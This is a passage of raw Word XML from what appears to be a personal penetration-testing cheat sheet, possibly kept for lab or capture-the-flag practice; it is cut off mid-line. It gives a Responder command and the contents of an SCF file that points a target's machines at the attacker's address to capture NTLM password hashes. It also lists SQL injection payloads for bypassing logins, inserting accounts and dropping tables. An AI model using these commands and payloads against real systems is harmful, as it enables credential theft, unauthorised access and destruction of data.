      <w:tr w:rsidR="00F86ADC" w14:paraId="2C6B9C61" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6948ED9F" w14:textId="1B59C2F5" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB">
            <w:r>
              <w:t>166.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2DD0EDF1" w14:textId="57A2BD4B" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>responder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>responder</w:t>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2279CB19" w14:textId="746A347F" w:rsidR="00F86ADC" w:rsidRDefault="0072537E" w:rsidP="001B52BB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Responder is an LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.</w:t>
            </w:r>
            <w:r w:rsidR="0028489A">
              <w:t xml:space="preserve"> By default, the tool will only answer to File Server Service requests, which is for SMB.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D1E0A3E" w14:textId="31B7CD9A" w:rsidR="00DF466D" w:rsidRDefault="0028489A" w:rsidP="001B52BB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>It is useful when setting up to listen for SCF attacks (</w:t>
            </w:r>
            <w:r w:rsidRPr="0028489A">
              <w:t xml:space="preserve">see </w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">Using SCF File To Gather Hashes’ </w:t>
            </w:r>
            <w:r>
              <w:t>earlier in the document</w:t>
            </w:r>
            <w:r w:rsidR="00DF466D">
              <w:t xml:space="preserve">). </w:t>
            </w:r>
            <w:r w:rsidR="00394A24">
              <w:t>Set it up</w:t>
            </w:r>
            <w:r w:rsidR="00DF466D">
              <w:t xml:space="preserve"> it like so:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278204E3" w14:textId="51EF862B" w:rsidR="0028489A" w:rsidRDefault="00DF466D" w:rsidP="001B52BB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE334D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE334D" w:rsidRPr="00DE334D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="00DE334D" w:rsidRPr="00DE334D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF466D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>responder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF466D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF466D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>tun0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF466D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">OUR.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w -r -f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0475A3C4" w14:textId="77777777" w:rsidR="00BC3458" w:rsidRDefault="00BC3458" w:rsidP="00BC3458">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-I     </w:t>
            </w:r>
            <w:r>
              <w:t>Set the interface</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i     </w:t>
            </w:r>
            <w:r>
              <w:t>Set our machine ip address</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:t>Start WPAD rouge proxy server</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-r     </w:t>
            </w:r>
            <w:r>
              <w:t>Enable answers for netbios wredir suffix queries</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="475F41C9" w14:textId="62CE3D8E" w:rsidR="00BC3458" w:rsidRDefault="00BC3458" w:rsidP="00BC3458">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f     </w:t>
            </w:r>
            <w:r>
              <w:t>Fingerprint a host that issued an NBT-NS or LLMNR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F86ADC" w14:paraId="514BFE89" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="375AFF58" w14:textId="4CD59C1D" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB">
            <w:r>
              <w:t>166.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="39029F19" w14:textId="77777777" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DAC7288" w14:textId="6AB5123D" w:rsidR="00394A24" w:rsidRPr="00394A24" w:rsidRDefault="00394A24" w:rsidP="00394A24">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Now you probably need to upload a .scf file on the target website, ensure the .scf file is saved with a @ at the front and contains some basic code to get it to call back to our machine (reiterated in</w:t>
            </w:r>
            <w:r w:rsidRPr="0028489A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3458">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">Using SCF File To Gather Hashes’ </w:t>
            </w:r>
            <w:r>
              <w:t>earlier in the document):</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>[shell]</w:t>
            </w:r>
            <w:r w:rsidR="00A21066">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A21066">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A21066">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(It seems the minimum you need are [shell] and the</w:t>
            </w:r>
            <w:r w:rsidRPr="00A21066">
              <w:br/>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="000908F3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>command=2</w:t>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>the iconfile=\\OUR.IP.ADD.RESS\)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BB2A2D9" w14:textId="367DFBD2" w:rsidR="00394A24" w:rsidRPr="00484576" w:rsidRDefault="00394A24" w:rsidP="00394A24">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>iconfile=\\OUR.IP.ADD.RESS\home\kali\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16235971" w14:textId="77777777" w:rsidR="00394A24" w:rsidRDefault="00394A24" w:rsidP="00394A24">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>[taskbar]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>command=toggledesktop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379E5C69" w14:textId="2BC50324" w:rsidR="00394A24" w:rsidRPr="00394A24" w:rsidRDefault="00394A24" w:rsidP="00394A24">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21066">
              <w:t>Once this file is uploaded, if it works, responder should capture hashes for the machine and user that responds to the .scf we just uploaded. You can find this in a log usually located at…</w:t>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/responder/logs</w:t>
            </w:r>
            <w:r w:rsidR="00A21066">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A21066" w:rsidRPr="00A21066">
              <w:t>and will be named something akin to:</w:t>
            </w:r>
            <w:r w:rsidR="00A21066">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
              <w:t>SMB-NTLMv2-SSP-10.10.11.106.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F86ADC" w14:paraId="40CA7E54" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6B70B82A" w14:textId="77777777" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5E5620C3" w14:textId="77777777" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2933BC45" w14:textId="77777777" w:rsidR="00F86ADC" w:rsidRPr="001E0F42" w:rsidRDefault="00F86ADC" w:rsidP="001B52BB"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="296DDABA" w14:textId="77777777" w:rsidR="00311DC9" w:rsidRDefault="00311DC9"/>
    <w:p w14:paraId="32AA27F9" w14:textId="77777777" w:rsidR="00311DC9" w:rsidRDefault="00311DC9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65361927" w14:textId="0D8C4877" w:rsidR="00C831BD" w:rsidRDefault="00C831BD" w:rsidP="00C831BD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk83217192"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scripts and Information: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCED16B" w14:textId="77777777" w:rsidR="00C831BD" w:rsidRDefault="00C831BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2157A6" w14:textId="77777777" w:rsidR="003F50AF" w:rsidRDefault="00C831BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>At a login page, in the username field try:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>blah’ or 1=1 --</w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t>blah';insert into login values ('</w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>','</w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>apple123</w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>'); --</w:t>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(If no error message is displayed, we have created a new login)</w:t>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003F0EF9" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">blah';create database </w:t>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>mydatabase</w:t>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>; --</w:t>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(If no error message is displayed, we have created a new database)</w:t>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F40A0F" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">blah'; DROP TABLE </w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>mydatabase</w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">; -- </w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
